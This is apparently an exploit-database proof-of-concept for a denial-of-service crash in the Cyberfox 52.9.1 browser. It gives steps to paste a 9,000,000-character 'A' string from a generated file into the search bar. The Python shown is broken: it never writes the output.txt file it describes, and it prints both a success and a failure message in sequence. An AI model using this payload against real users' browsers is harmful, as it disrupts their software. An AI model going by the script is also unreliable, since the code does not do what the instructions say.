# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
# Date: 2021-09-26
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cyberfox.8pecxstudios.com
# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html
# Version: v52.9.1 (Possibly all versions)
# Tested on: windows
#[ About - Cyberfox ] :
#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture
#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages.
# [ Exploit/POC ] :
# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Cyberfox Web Browser
# 3.Copy the content of the file "output.txt" & Pasteinto the "search bar"
# 4.Crashed
Overflow = "\x41" * 9000000
print("[!] Creating %s bytes DOS payload...." %len(Overflow))
print("[!] File Created !")
print("File cannot be created")